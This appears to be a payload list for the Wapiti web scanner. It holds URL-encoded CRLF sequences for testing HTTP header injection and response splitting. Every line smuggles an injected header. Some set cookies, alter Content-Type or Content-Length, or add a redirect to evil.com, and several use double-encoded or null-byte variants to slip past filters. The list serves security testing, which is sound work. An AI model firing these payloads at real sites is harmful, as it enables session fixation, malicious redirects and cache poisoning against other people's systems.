%0d%0awapiti:%20injected
%0awapiti:%20injected
%0dwapiti:%20injected
%0d%0a%0d%0awapiti:%20injected
x%0d%0awapiti:%203.2.6
%0d%0a%20wapiti:%20injected
%0d%0a%09wapiti:%20injected
%20%0d%0awapiti:%20injected
%00%0d%0awapiti:%20injected
%0d%20%0awapiti:%20injected
%0a%20wapiti:%20injected
%0d%0aSet-Cookie:%20wapiti=injected
%0aSet-Cookie:%20wapiti=injected
%0d%0aLocation:%20http://evil.com%0d%0awapiti:%20injected
%0aLocation:%20http://evil.com%0awapiti:%20injected
%0d%0aContent-Type:%20text/html%0d%0awapiti:%20injected%0d%0a%0d%0a
%0aContent-Type:%20text/html%0awapiti:%20injected%0a%0a
%0d%0aContent-Length:%200%0d%0awapiti:%20injected%0d%0a%0d%0a
%0aContent-Length:%200%0awapiti:%20injected%0a%0a
%250d%250awapiti:%20injected
%250awapiti:%20injected
%u000d%u000awapiti:%20injected
%5cr%5cnwapiti:%20injected
%5c%72%5c%6e%0d%0awapiti:%20test
